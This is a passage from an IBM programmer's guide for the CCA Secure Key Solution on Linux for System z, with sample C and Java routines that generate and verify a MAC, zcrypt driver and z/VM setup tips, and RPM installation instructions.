Encrypted PIN Translate (CSNBPTR) +| – ANSI X9.8 PIN - Enforce PIN block restrictions (offset X'0350') +| – ANSI X9.8 PIN -Allow modification of PAN_01_0350 (offset X'0351') +| – ANSI X9.8 PIN -Allow onlyANSI PIN blocks_01_0350 (offset X'0352') +| v Secure Messaging for PINs (CSNBSPN) +| – ANSI X9.8 PIN - Enforce PIN block restrictions (offset X'0350') +| – ANSI X9.8 PIN -Allow modification of PAN_01_0350 (offset X'0351') +| – ANSI X9.8 PIN -Allow onlyANSI PIN blocks_01_0350 (offset X'0352') +AppendixG.Accesscontrolpointsandverbs 525 + +526 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Appendix H. Sample verb call routines +| This appendix contains sample verb call routines for both C and Java. +IMPORTANT +The user must load the Symmetric Master Key before the verb calls will complete successfully, +otherwise return code 12 reason code 764 will be returned. +To illustrate the practical application of CCAverb calls, this appendix describes the sample routines +included with the RPM.Asample in C, and one in Java is included. +The sample routines generate a MessageAuthentication Code (MAC) on a text string, and then verifies +the MAC. To accomplish this, the routine: +v Calls the Key Generate (CSNBKGN or CSNBKGNJ) verb to create a MAC/MACVER key pair. +v Calls the MAC Generate (CSNBMGN or CSNBMGNJ) verb to generate a MAC on a text string with the +MAC key. +v Calls the MAC Verify (CSNBMVR or CSNBMVRJ) verb to verify the text string MAC with the MACVER +key. +As you review the sample routines shown in Figure34 on page 528 and Figure35 on page 533, refer to +the chapters in this book for descriptions of the called verbs and their parameters. These verbs are listed +in Table160. +Table160.Verbscalledbythesampleroutines +Verb EntrypointnameforCandJavaversions +KeyGenerate CSNBKGNorCSNBKGNJ +MACGenerate CSNBMGNorCSNBMGNJ +MACVerify CSNBMVRorCSNBMVRJ +Sample program in C +This sample code, which consists of a C program (mac.c) and a makefile (makefile.Inx), can be found in +the /opt/IBM/CEX3C/samples directory. For reference, a copy of the sample routine is shown in Figure34 +on page 528. +©CopyrightIBMCorp.2007,2011 527 + +/*********************************************************************/ +/* */ +/* Module Name: mac.c */ +/* */ +/* DESCRIPTIVE NAME: Cryptographic Coprocessor Support Program */ +/* C language source code example */ +/* */ +/*-------------------------------------------------------------------*/ +/* */ +/* Licensed Materials - Property of IBM */ +/* */ +/* (C) Copyright IBM Corp. 1997-2001 All Rights Reserved */ +/* */ +/* US Government Users Restricted Rights - Use duplication or */ +/* disclosure restricted by GSA ADP Schedule Contract with IBM Corp. */ +/* */ +/*-------------------------------------------------------------------*/ +/* */ +/* NOTICE TO USERS OF THE SOURCE CODE EXAMPLES */ +/* */ +/* The source code examples provided by IBM are only intended to */ +/* assist in the development of a working software program. The */ +/* source code examples do not function as written: additional */ +/* code is required. In addition, the source code examples may */ +/* not compile and/or bind successfully as written. */ +/* */ +/* International Business Machines Corporation provides the source */ +/* code examples, both individually and as one or more groups, */ +/* "as is" without warranty of any kind, either expressed or */ +/* implied, including, but not limited to the implied warranties of */ +/* merchantability and fitness for a particular purpose. The entire */ +/* risk as to the quality and performance of the source code */ +/* examples, both individually and as one or more groups, is with */ +/* you. Should any part of the source code examples prove defective, */ +/* you (and not IBM or an authorized dealer) assume the entire cost */ +/* of all necessary servicing, repair or correction. */ +/* */ +/* IBM does not warrant that the contents of the source code */ +/* examples, whether individually or as one or more groups, will */ +/* meet your requirements or that the source code examples are */ +/* error-free. */ +/* */ +/* IBM may make improvements and/or changes in the source code */ +/* examples at any time. */ +/* */ +/* Changes may be made periodically to the information in the */ +/* source code examples; these changes may be reported, for the */ +/* sample code included herein, in new editions of the examples. */ +/* */ +/* References in the source code examples to IBM products, programs, */ +/* or services do not imply that IBM intends to make these */ +/* available in all countries in which IBM operates. Any reference */ +/* to the IBM licensed program in the source code examples is not */ +/* intended to state or imply that IBM’s licensed program must be */ +/* used. Any functionally equivalent program may be used. */ +/* */ +Figure34.Syntax,sampleroutineinC(Part1of4) +528 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +/*-------------------------------------------------------------------*/ +/* */ +/* This example program: */ +/* */ +/* 1) Calls the Key_Generate verb (CSNBKGN) to create a MAC (message */ +/* authentication code) key token and a MACVER key token. */ +/* */ +/* 2) Calls the MAC_Generate verb (CSNBMGN) using the MAC key token */ +/* from step 1 to generate a MAC on the supplied text string */ +/* (INPUT_TEXT). */ +/* */ +/* 3) Calls the MAC_Verify verb (CSNBMVR) to verify the MAC for the */ +/* same text string, using the MACVER key token created in */ +/* step 1. */ +/* */ +/*********************************************************************/ +#include +#include +#ifdef _AIX +#include +#elif __WINDOWS__ +#include "csunincl.h" +#else +#include "csulincl.h" /* else linux */ +#endif +/* Defines */ +#define KEY_FORM "OPOP" +#define KEY_LENGTH "SINGLE " +#define KEY_TYPE_1 "MAC " +#define KEY_TYPE_2 "MACVER " +#define INPUT_TEXT "abcdefhgijklmn0987654321" +#define MAC_PROCESSING_RULE "X9.9-1 " +#define SEGMENT_FLAG "ONLY " +#define MAC_LENGTH "HEX-9 " +#define MAC_BUFFER_LENGTH 10 +void main() +{ +static long return_code; +static long reason_code; +static unsigned char key_form[4]; +static unsigned char key_length[8]; +static unsigned char mac_key_type[8]; +static unsigned char macver_key_type[8]; +static unsigned char kek_key_id_1[64]; +static unsigned char kek_key_id_2[64]; +static unsigned char mac_key_id[64]; +static unsigned char macver_key_id[64]; +static long text_length; +static unsigned char text[26]; +static long rule_array_count; +static unsigned char rule_array[3][8]; /* Max 3 rule array elements */ +static unsigned char chaining_vector[18]; +static unsigned char mac_value[MAC_BUFFER_LENGTH]; +/* Print a banner */ +printf("Cryptographic Coprocessor Support Program example program.\n"); +Figure34.Syntax,sampleroutineinC(Part2of4) +AppendixH.Sampleverbcallroutines 529 + +/* Set up initial values for Key_Generate call */ +return_code = 0; +reason_code = 0; +memcpy (key_form, KEY_FORM, 4); /* OPOP key pair */ +memcpy (key_length, KEY_LENGTH, 8); /* Single-length keys */ +memcpy (mac_key_type, KEY_TYPE_1, 8); /* 1st token, MAC key type */ +memcpy (macver_key_type, KEY_TYPE_2, 8); /* 2nd token, MACVER key type */ +memset (kek_key_id_1, 0x00, sizeof(kek_key_id_1)); /* 1st KEK not used */ +memset (kek_key_id_2, 0x00, sizeof(kek_key_id_2)); /* 2nd KEK not used */ +memset (mac_key_id, 0x00, sizeof(mac_key_id)); /* Init 1st key token */ +memset (macver_key_id, 0x00, sizeof(macver_key_id)); /* Init 2nd key token */ +/* Generate a MAC/MACVER operational key pair */ +CSNBKGN(&return_code, +&reason_code, +NULL, /* exit_data_length */ +NULL, /* exit_data */ +key_form, +key_length, +mac_key_type, +macver_key_type, +kek_key_id_1, +kek_key_id_2, +mac_key_id, +macver_key_id); +/* Check the return/reason codes. Terminate if there is an error. */ +if (return_code != 0 || reason_code != 0) { +printf ("Key_Generate failed: "); /* Print failing verb */ +printf ("return_code = %ld, ", return_code); /* Print return code */ +printf ("reason_code = %ld.\n", reason_code); /* Print reason code */ +return; +} +else +printf ("Key_Generate successful.\n"); +/* Set up initial values for MAC_Generate call */ +return_code = 0; +reason_code = 0; +text_length = sizeof (INPUT_TEXT) - 1; /* Length of MAC text */ +memcpy (text, INPUT_TEXT, text_length); /* Define MAC input text */ +rule_array_count = 3; /* 3 rule array elements */ +memset (rule_array, ’ ’, sizeof(rule_array)); /* Clear rule array */ +memcpy (rule_array[0], MAC_PROCESSING_RULE, 8); /* 1st rule array element */ +memcpy (rule_array[1], SEGMENT_FLAG, 8); /* 2nd rule array element */ +memcpy (rule_array[2], MAC_LENGTH, 8); /* 3rd rule array element */ +memset (chaining_vector, 0x00, 18); /* Clear chaining vector */ +memset (mac_value, 0x00, sizeof(mac_value)); /* Clear MAC value */ +Figure34.Syntax,sampleroutineinC(Part3of4) +530 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +/* Generate a MAC based on input text */ +CSNBMGN ( &return_code, +&reason_code, +NULL, /* exit_data_length */ +NULL, /* exit_data */ +mac_key_id, /* Output from Key Generate */ +&text_length, +text, +&rule_array_count, +&rule_array[0][0], +chaining_vector, +mac_value); +/* Check the return/reason codes. Terminate if there is an error. */ +if (return_code != 0 || reason_code != 0) { +printf ("MAC Generate Failed: "); /* Print failing verb */ +printf ("return_code = %ld, ", return_code); /* Print return code */ +printf ("reason_code = %ld.\n", reason_code); /* Print reason code */ +return; +} +else { +printf ("MAC_Generate successful.\n"); +printf ("MAC_value = %s\n", mac_value); /* Print MAC value (HEX-9) */ +} +/* Set up initial values for MAC_Verify call */ +return_code = 0; +reason_code = 0; +rule_array_count = 1; /* 1 rule array element */ +memset (rule_array, ’ ’, sizeof(rule_array));/* Clear rule array */ +memcpy (rule_array[0], MAC_LENGTH, 8); /* Rule array element */ +/* (use default Ciphering */ +/* Method and Segmenting */ +/* Control) */ +memset (chaining_vector, 0x00, 18); /* Clear the chaining vector */ +/* Verify MAC value */ +CSNBMVR (&return_code, +&reason_code, +NULL, /* exit_data_length */ +NULL, /* exit_data */ +macver_key_id, /* Output from Key_Generate */ +&text_length, /* Same as for MAC_Generate */ +text, /* Same as for MAC_Generate */ +&rule_array_count, +&rule_array[0][0], +chaining_vector, +mac_value); /* Output from MAC_Generate */ +/* Check the return/reason codes. Terminate if there is an error. */ +if (return_code != 0 || reason_code != 0) { +printf ("MAC_Verify failed: "); /* Print failing verb */ +printf ("return_code = %ld, ", return_code); /* Print return code */ +printf ("reason_code = %ld.\n", reason_code); /* Print reason code */ +return; +} +else /* No error occurred */ +printf ("MAC_Verify successful.\n"); +} +Figure34.Syntax,sampleroutineinC(Part4of4) +AppendixH.Sampleverbcallroutines 531 + +Sample program in Java +Before running this program, review the information about the JNI interface in “Building Java applications +to use with the CCAJNI” on page 16. +This sample code consists of a Java program named mac.java. For reference, a copy of the sample +routine is shown in Figure35 on page 533.Another sample program named RNG.java is included with the +distribution at the same location, but is not copied here because it is a very simple JNI reference exercise +to call the Random Number Generate verb. +The default distribution location of the sample code is: +Operating system Default distribution location +Novell SUSE Linux /opt/IBM/CEX3C/samples +Red Hat Linux /opt/IBM/CEX3C/samples +Invoke the following command from the directory that contains the sample source code to compile the +program: +javac -classpath /opt/IBM/CEX3C/cnm/HIKM.zip mac.java +Notes: +1. The classpath option points to the HIKM.zip file because the hikmNativeInteger class is in this file. +2. The path shown for the HIKM.zip file is the default distribution location of that file. +When it is compiled, you can run the sample Java program from the directory that contains the compiled +output, with these commands. +For a Red Hat Linux system: +export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64 +/opt/ibm/java-i386-60/jre/bin/java -classpath /opt/IBM/CEX3C/cnm/HIKM.zip:. mac +For a Novell SUSE Linux system: +export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64 +java -classpath /opt/IBM/CEX3C/cnm/HIKM.zip:. mac +Notes: +1. The path shown for the HIKM.zip file is the default distribution location of that file. +2. The libcsulcca.so library for Linux also contains the C support for the CCAJava Native Interface (JNI). +532 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +/*********************************************************************/ +/* */ +/* Module Name: mac.java */ +/* */ +/* DESCRIPTIVE NAME: Cryptographic Coprocessor Support Program */ +/* JNI example code */ +/* */ +/*-------------------------------------------------------------------*/ +/* */ +/* Licensed Materials - Property of IBM */ +/* */ +/* Copyright IBM Corp. 2010 All Rights Reserved */ +/* */ +/* US Government Users Restricted Rights - Use duplication or */ +/* disclosure restricted by GSA ADP Schedule Contract with IBM Corp. */ +/* */ +/*-------------------------------------------------------------------*/ +/* */ +/* NOTICE TO USERS OF THE SOURCE CODE EXAMPLES */ +/* */ +/* The source code examples provided by IBM are only intended to */ +/* assist in the development of a working software program. The */ +/* source code examples do not function as written: additional */ +/* code is required. In addition, the source code examples may */ +/* not compile and/or bind successfully as written. */ +/* */ +/* International Business Machines Corporation provides the source */ +/* code examples, both individually and as one or more groups, */ +/* "as is" without warranty of any kind, either expressed or */ +/* implied, including, but not limited to the implied warranties of */ +/* merchantability and fitness for a particular purpose. The entire */ +/* risk as to the quality and performance of the source code */ +/* examples, both individually and as one or more groups, is with */ +/* you. Should any part of the source code examples prove defective, */ +/* you (and not IBM or an authorized dealer) assume the entire cost */ +/* of all necessary servicing, repair or correction. */ +/* */ +/* IBM does not warrant that the contents of the source code */ +/* examples, whether individually or as one or more groups, will */ +/* meet your requirements or that the source code examples are */ +/* error-free. */ +/* */ +/* IBM may make improvements and/or changes in the source code */ +/* examples at any time. */ +/* */ +/* Changes may be made periodically to the information in the */ +/* source code examples; these changes may be reported, for the */ +/* sample code included herein, in new editions of the examples. */ +/* */ +/* References in the source code examples to IBM products, programs, */ +/* or services do not imply that IBM intends to make these */ +/* available in all countries in which IBM operates. Any reference */ +/* to the IBM licensed program in the source code examples is not */ +/* intended to state or imply that IBM’s licensed program must be */ +/* used. Any functionally equivalent program may be used. */ +Figure35.Syntax,sampleroutineinJava(Part1of4) +AppendixH.Sampleverbcallroutines 533 + +/*-------------------------------------------------------------------*/ +/* */ +/* This example program: */ +/* */ +/* 1) Calls the Key_Generate verb (CSNBKGNJ) to create a MAC (message*/ +/* authentication code) key token and a MACVER key token. */ +/* */ +/* 2) Calls the MAC_Generate verb (CSNBMGNJ) using the MAC key token */ +/* from step 1 to generate a MAC on the supplied text string */ +/* (INPUT_TEXT). */ +/* */ +/* 3) Calls the MAC_Verify verb (CSNBMVRJ) to verify the MAC for the */ +/* same text string, using the MACVER key token created in */ +/* step 1. */ +/* */ +/*********************************************************************/ +import java.io.*; +public class mac +{ +static final String KEY_FORM = "OPOP"; +static final String KEY_LENGTH = "SINGLE "; +static final String KEY_TYPE_1 = "MAC "; +static final String KEY_TYPE_2 = "MACVER "; +static final String INPUT_TEXT = "abcdefhgijklmnopqrstuvwx"; +static final String MAC_PROCESSING_RULE = "X9.9-1 "; +static final String SEGMENT_FLAG = "ONLY "; +static final String MAC_LENGTH = "HEX-9 "; +public static void main (String args[]) +{ +byte [] ByteExitData = new byte [4]; +byte [] Byte_key_form = new byte [4]; +byte [] Byte_key_length = new byte [8]; +byte [] Byte_mac_key_type = new byte [8]; +byte [] Byte_macver_key_type = new byte [8]; +byte [] Byte_mac_value = new byte [10]; +byte [] Byte_chaining_vector = new byte [18]; +byte [] Byte_rule_array = new byte [24]; +byte [] Byte_text = new byte [26]; +byte [] Byte_kek_key_id_1 = new byte [64]; +byte [] Byte_kek_key_id_2 = new byte [64]; +byte [] Byte_mac_key_id = new byte [64]; +byte [] Byte_macver_key_id = new byte [64]; +try +{ +//setup to pause on non-zero return/reason code +//and require enter key to continue +BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in)); +hikmNativeInteger IntReturncode = new hikmNativeInteger(0); +hikmNativeInteger IntReasoncode = new hikmNativeInteger(0); +hikmNativeInteger IntExitDataLength = new hikmNativeInteger(0); +/* Print beginning banner */ +System.out.println("\nCryptographic Coprocessor Support Program JAVA example program.\n"); +Figure35.Syntax,sampleroutineinJava(Part2of4) +534 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +/* Set up initial values for Key_Generate call */ +Byte_key_form = new String(KEY_FORM).getBytes(); /* OPOP key pair */ +Byte_key_length = new String(KEY_LENGTH).getBytes();/* Single-length keys */ +Byte_mac_key_type = new String(KEY_TYPE_1).getBytes();/* 1st token, MAC key type */ +Byte_macver_key_type = new String(KEY_TYPE_2).getBytes();/* 2nd token, MACVER key type */ +/* Generate a MAC/MACVER operational key pair */ +new HIKM().CSNBKGNJ (IntReturncode, +IntReasoncode, +IntExitDataLength, +ByteExitData, +Byte_key_form, +Byte_key_length, +Byte_mac_key_type, +Byte_macver_key_type, +Byte_kek_key_id_1, +Byte_kek_key_id_2, +Byte_mac_key_id, +Byte_macver_key_id); +if ( 0 != IntReturncode.getValue() || 0 != IntReasoncode.getValue() ) +{ +System.out.println ("\nKey Generate Failed"); /* Print failing verb. */ +System.out.println ("Return_code = " + IntReturncode.getValue()); /* Print return code. */ +System.out.println ("Reason_code = " + IntReasoncode.getValue()); /* Print reason code. */ +System.out.println ("Press ENTER to continue..."); /* Print Pause message */ +stdin.readLine(); +} +else +{ +System.out.println ("Key_Generate successful."); +} +/* Set up initial values for MAC_Generate call */ +IntReturncode = new hikmNativeInteger(0); +IntReasoncode = new hikmNativeInteger(0); +IntExitDataLength = new hikmNativeInteger(0); +hikmNativeInteger Int_rule_array_count = new hikmNativeInteger(3); +hikmNativeInteger Int_text_length = new hikmNativeInteger(24); +Byte_text = new String (INPUT_TEXT).getBytes(); /*Define MAC input text */ +byte [] temp_array = new String (MAC_PROCESSING_RULE).getBytes(); /*1st rule array element*/ +System.arraycopy( temp_array, 0, Byte_rule_array, 0, temp_array.length); /*1st rule array element*/ +temp_array = new String(SEGMENT_FLAG).getBytes(); /*2nd rule array element*/ +System.arraycopy( temp_array, 0, Byte_rule_array, 8, temp_array.length); /*2nd rule array element*/ +temp_array = new String(MAC_LENGTH).getBytes(); /*3rd rule array element*/ +System.arraycopy( temp_array, 0, Byte_rule_array, 16, temp_array.length);/*3rd rule array element*/ +/* Generate a MAC based on input text */ +new HIKM().CSNBMGNJ (IntReturncode, +IntReasoncode, +IntExitDataLength, +ByteExitData, +Byte_mac_key_id, +Int_text_length, +Byte_text, +Int_rule_array_count, +Byte_rule_array, +Byte_chaining_vector, +Byte_mac_value); +Figure35.Syntax,sampleroutineinJava(Part3of4) +AppendixH.Sampleverbcallroutines 535 + +if ( 0 != IntReturncode.getValue() || 0 != IntReasoncode.getValue() ) +{ +System.out.println ("\nMAC Generate Failed"); /* Print failing verb. */ +System.out.println ("Return_code = " + IntReturncode.getValue()); /* Print return code. */ +System.out.println ("Reason_code = " + IntReasoncode.getValue()); /* Print reason code. */ +System.out.println ("Press ENTER to continue..."); /* Print Pause message */ +stdin.readLine(); +} +else +{ +System.out.println ("MAC_Generate successful."); +System.out.println ("MAC_value = [" + new String(Byte_mac_value) + "]"); +} +/* Set up initial values for MAC_Verify call */ +IntReturncode = new hikmNativeInteger(0); +IntReasoncode = new hikmNativeInteger(0); +IntExitDataLength = new hikmNativeInteger(0); +Byte_rule_array = new String (MAC_LENGTH).getBytes(); /* Rule array element */ +Int_rule_array_count = new hikmNativeInteger(1); +new HIKM().CSNBMVRJ (IntReturncode, +IntReasoncode, +IntExitDataLength, +ByteExitData, +Byte_macver_key_id, +Int_text_length, +Byte_text, +Int_rule_array_count, +Byte_rule_array, +Byte_chaining_vector, +Byte_mac_value); +if ( 0 != IntReturncode.getValue() || 0 != IntReasoncode.getValue() ) +{ +System.out.println ("\nMAC_Verify Failed"); /* Print failing verb. */ +System.out.println ("Return_code = " + IntReturncode.getValue()); /* Print return code. */ +System.out.println ("Reason_code = " + IntReasoncode.getValue()); /* Print reason code. */ +System.out.println ("Press ENTER to continue..."); /* Print Pause message */ +stdin.readLine(); +} +else +{ +System.out.println ("MAC_Verify successful."); +} +} +catch (Exception anException) +{ +System.out.println(anException); +} +/* Print ending banner */ +System.out.println("\nCryptographic Coprocessor Support Program JAVA example program finished.\n"); +}//end main +}//end mac class +Figure35.Syntax,sampleroutineinJava(Part4of4) +536 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Appendix I. Initial system set up tips +This appendix contains tips to help you set up your system for the first time. +| The name of the CCA4.1.0 RPM is: csulcca-4.1.0-maintenance level.s390x.rpm, where maintenance +| level is a number representing the current maintenance level. +| In order to use the full set of CCARelease 4.1.0 functions, a CEX3C feature is required. This feature must +| have a CCAcode level of 4.1.0 for RPM platform target s390x. This CEX3C feature is available with IBM +| System z10 model GA3 and higher models.Alimited set of CCARelease 4.1.0 and 4.0.0 functions can be +| used with a CEX2C feature. +Consult the README.linz file in the /opt/IBM/CEX3C/doc/ directory for this information: +v Release-specific information, if there is any +v Pointers to helpful tools +Installing and loading the cryptographic device driver +The cryptographic device driver 'zcrypt' is already included in the regular kernel package shipped with your +Linux distribution. The cryptographic device driver is provided as a single kernel module named z90crypt. +For information on how to load and configure the cryptographic device driver refer to the documentation +provided with your Linux distribution, and Device Drivers, Features, and Commands, SC33-8411. Because +there are some versions of this book that are for a specific Linux kernel, make sure that you refer to the +book that goes with your specific Linux kernel level. +| Note: Unload of the device driver is complicated slightly because the catcher.exe daemon is always +| running, to be ready to receive TKE requests. Unloading the device driver normally or in +| preparation for a reload requires stopping the catcher.exe daemon. This can be done with the +| service management script /etc/init.d/CSUTKEcat using the 'stop' argument, or by using the 'ps' +| command to find the PID for the daemon, and then using the 'kill -9 'command to kill it. +| After reloading the device driver (using modprobe or other method) you may restart the catcher.exe +| daemon (re-enabling TKE access) using the '/etc/init.d/CSUTKEcat start' command. +zcrypt device driver usage +The zcrypt driver supports kernel parameter: +domain +An integer argument that sets the domain index forAP devices. If not set or set to -1, the domain +index with the maximum number of devices will be used. You have to make sure that the selected +domain contains at least one CEX3C adapter. +The poll_thread parameter is no longer used. If you are running Linux in an LPAR on an IBM System z10 +EC or later,AP interrupts are used instead of the polling thread. The polling thread is disabled whenAP +interrupts are available. +Depending on the Linux distribution being used, it is possible to display zcrypt information using the +lszcrypt command.Also, the chzcrypt command enables and disables the cryptographic cards. See Device +Drivers, Features, and Commands, SC33-8411. Because there are some versions of this book that are for +a specific Linux kernel, make sure that you refer to the book that goes with your specific Linux kernel +level. +©CopyrightIBMCorp.2007,2011 537 + +High resolution polling timer +The zcrypt driver can run with or without the polling thread. When running with the polling thread, one +CPU without an outstanding workload is constantly polling the cryptographic cards for finished +cryptographic requests. The polling thread sleeps when no cryptographic requests are being processed. +This mode utilizes the cryptographic cards as much as possible at the cost of blocking one CPU. Without +the polling thread, the cryptographic cards are polled at a much lower rate. This could result in higher +latency and reduced throughput for cryptographic requests. +The high resolution polling timer is available for some Linux distributions. This timer can be used to set the +polling frequency to be larger than 100 Hz. See the chzcrypt command in Device Drivers, Features, and +Commands, SC33-8411. Be aware that setting a value larger than 100 Hz is not valid ifAP interrupts are +used. +The sysfs interface +The zcrypt cryptographic driver utilizes the device model introduced with the Linux 2.6 kernel series. It +introduces a new bus named "AP" which can be found under /sys/bus/ap. +The following attributes are defined atAP bus level: +/sys/bus/ap/ap_domain Read-only attribute representing the domain index used for allAP devices. +/sys/bus/ap/ap_interrupts Read-only attribute indicating whetherAP adapter interrupts are used.A +value of 1 means thatAP adapter interrupts are used.Avalue of 0 means +that they are not used. +/sys/bus/ap/config_time Read-write attribute representing the interval in seconds for re-scanning +theAP bus for new or gone devices. +/sys/bus/ap/drivers_autoprobe +This attribute controls whether a bus can bind devices by default, +indicated by a value of 1. If not (value of 0), the bus initializes the device +and does nothing else. +/sys/bus/ap/drivers_probe This attribute controls whether a bus (its ID is given as input) can attempt +to bind a driver to this device.Avalue of 1 is 'yes' and a value of 0 is 'no'. +/sys/bus/ap/poll_thread Read-write attribute indicating whether a polling thread is to be used to +increase cryptographic performance. By writing 0 or 1 to this attribute the +poll thread can be disabled or enabled. +/sys/bus/ap/poll_timeout Read-write attribute representing the interval (in nanoseconds) for polling +timeout on theAP bus. +/sys/bus/ap/uevent File for storing uevents. Every time that theAP bus detects a device +addition or removal, a new uevent is generated. If there is a udev rule, it +can catch this event and perform appropriate actions. +For each cryptographic adapter a new directory in /sys/bus/ap/devices is created using the following +naming convention: cardxx where xx is the device index for each device. The valid device index range is +hex X'00' to X'3f'. For example, device X'1a' can be found under /sys/bus/ap/devices/card1a. Within +each device directory the following attributes can be found: +depth Read-only attribute representing the input queue length for this device. +hwtype Read-only attribute representing the hardware type for this device. The following values +are defined: +3 PCICC cards +4 PCICAcards +538 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +5 PCIXCC cards +6 CEX2Acards +7 CEX2C cards +8 CEX3Acards +9 CEX3C cards +modalias Read-only attribute representing an internally used device bus-ID. +online Read-write attribute representing the online status for thisAP device. Writing 0 or 1 to this +attribute sets this device offline or online. +request_count +Read-only attribute representing the number of requests already processed by this device. +type Read-only attribute representing the type of this device. The following types are defined: +v PCICC +v PCICA +v PCIXCC_MCL2 +v PCIXCC_MCL3 +v CEX2A +v CEX2C +v CEX3A +v CEX3C +Running secure key under a z/VM guest +| In order to use the CEX3C feature under z/VM versions 6.1, and 5.4, you need to apply theseAPAR fixes: +APAR number Description +VM64656 Introduces CEX3C support. +|| VM64727 Fixes problem with shared coprocessors. +VM64793 Introduces protected key CPACF support. +To get secure key running under a z/VM guest, a directory control statement (CRYPTOAPDED) for a +given VM guest needs to be used. This require that theAP's with this domain are owned by the LPAR. +There is no virtualization done by z/VM. +For secure key, z/VM does not virtualize theAP's. TheAP's need to be dedicated, which is done by the +user statement: +CRYPTO DOMAIN 12 APDED 5 7 +This statement dedicatesAP's 5 and 7 for domain 12 to one Linux guest. +For clear key, z/VM does a virtualization for theAP's, which is done by the user statement: +CRYPTO APVIRT +The domain must have one or moreAP's for this. If available, an accelerator is used. If not, a coprocessor +is taken. The guest always sees only one card regardless of how many cards are owned by the LPAR. +This requires that the cards are made available to the LPAR in which VM is running. The domain andAPs +must be defined in the LPAR profile. +Note that the CCAdoes not use and can not handle the clear key settings. +AppendixI.Initialsystemsetuptips 539 + +540 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Appendix J. CCA installation instructions +This appendix contains CAARelease 4.0.0 and later installation, configuration, and uninstallation +instructions. +| +Before you begin +| In this section, these terms are used to describe CCARPMs, referring to several different versions: +|| CCA4.x CCA4.0.0, CCA4.1.0, and subsequent versions. +|| CCA3.x Any CCAversion 3 release. +Before you begin the CCAinstallation, review these points: +v Ensure that you are using supported hardware. See “Hardware requirements” on page xvii. +v Ensure that your Linux distribution has the zcrypt device driver support. For details, see “Installing and +loading the cryptographic device driver” on page 537. +v If you are going to use the Java Native Interface (JNI), see “Building Java applications to use with the +CCAJNI” on page 16 for supported Java levels and installation instructions. +v If you plan on maintaining a dual install environment alongside the legacy xcryptolinz RPM originally +released to support the CEX2C, take note of these facts: +| – The CEX3C CCA4.x RPMs support CEX2C access, includingAES (for up-to-date CEX2C firmware) +| and all functions formerly available for the CEX2C. It is recommended to use the latest CEX3C CCA +| 4.x library for all CEX*C access. +– The new TKE catcher daemon supports managing CEX2C as well as CEX3C. +– You are advised to pay special attention toAppendixK, “Coexistence of CEX3C and CEX2C +features,” on page 549 and particular the section “Dual Support: Key storage interactions” on page +551. +Download and install the RPM +| The CCARPM contains files, samples, and groups. The latest CCARPM as of this publication is a +| packaged build of CCA4.1.0 for RPM platform target s390x. The CCARPM has a naming convention of +| csulcca-4.1.0-maintenance level.s390x.rpm, where maintenance level is a number representing the +| current maintenance level. +To download the RPM, complete these steps: +1. Point your Web browser at this location: +http://www.ibm.com/security/cryptocards +2. Locate the box on the left side labeled Cryptocards. +3. Click the PCIe Cryptographic Coprocessor link from the Cryptocards box. +4. The Cryptocards box will be updated with a submenu underneath the PCIe Cryptographic +Coprocessor name. +5. Find the Software download link on this submenu and click it. +6. The main page will be updated with information on downloading host software for various platforms. +7. On this page, find the heading Obtaining CCAsoftware for System z servers running Linux. +8. In the paragraph underneath this heading will be the links to download: +v The README file for the RPM. +v The RPM itself that installs the host code. +©CopyrightIBMCorp.2007,2011 541 + +Files in the RPM +These files are included in the RPM: +/etc/profile.d/csulcca.sh +Environment variables are created in this file, customers should read for up-to-date information. +The key storage environment variables are added here. See “Environment variables for the key +storage file” on page 262. +/etc/profile.d/csulcca.csh +Environment variables are created in this file, customers should read for up-to-date information. +The key storage environment variables are added here. See “Environment variables for the key +storage file” on page 262. +Note: /etc/profile.d/csulcca.sh and /etc/profile.d/csulcca.csh are exactly the same in what they +do, but have syntax differences. Only one of these two files is used, depending on the +configuration of the particular user running an application. +/etc/init.d/CSUTKEcat +/etc/rc.d/rc2.d/S14CSUTKEcat +Link to: /etc/init.d/CSUTKEcat +/etc/rc.d/rc3.d/S14CSUTKEcat +Link to: /etc/init.d/CSUTKEcat +/etc/rc.d/rc5.d/S14CSUTKEcat +Link to: /etc/init.d/CSUTKEcat +/opt/IBM/CEX3C/bin/TKECM.dat +/opt/IBM/CEX3C/bin/acpoints.dat +/opt/IBM/CEX3C/bin/catcher.exe +/opt/IBM/CEX3C/bin/panel.exe +Utility: run with no arguments for usage +/opt/IBM/CEX3C/bin/ivp.e +Utility: run with no arguments for install verification +/opt/IBM/CEX3C/bin/profile.perl +/opt/IBM/CEX3C/doc/README.linz +| /opt/IBM/CEX3C/doc/license.txt +| /opt/IBM/CEX3C/include/csulincl.h +/opt/IBM/CEX3C/include/HIKM.h +/opt/IBM/CEX3C/doc/hikmNativeInteger.html +/opt/IBM/CEX3C/cnm/HIKM.zip +/opt/IBM/CEX3C/cnm/HIKMMK.zip +/usr/lib64/libcsulcca.so +Link to: /usr/lib64/libcsulcca.so.4 +| /usr/lib64/libcsulcca.so.4 +| Link to: /usr/lib64/libcsulcca.so.4.1.0 +| /usr/lib64/libcsulcca.so.4.1.0 +| /usr/lib64/libcsulccamk.so +Link to: /usr/lib64/libcsulccamk.so.4 +542 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| /usr/lib64/libcsulccamk.so.4 +| Link to: /usr/lib64/libcsulccamk.so.4.1.0 +| /usr/lib64/libcsulccamk.so.4.1.0 +| /opt/IBM/CEX3C/keys/README.keys +Samples in the RPM +These samples are included in the RPM: +/opt/IBM/CEX3C/samples/mac.c +C code sample +/opt/IBM/CEX3C/samples/makefile.lnx +Used to build mac.c +/opt/IBM/CEX3C/samples/mac.java +Java code sample +/opt/IBM/CEX3C/samples/RNG.java 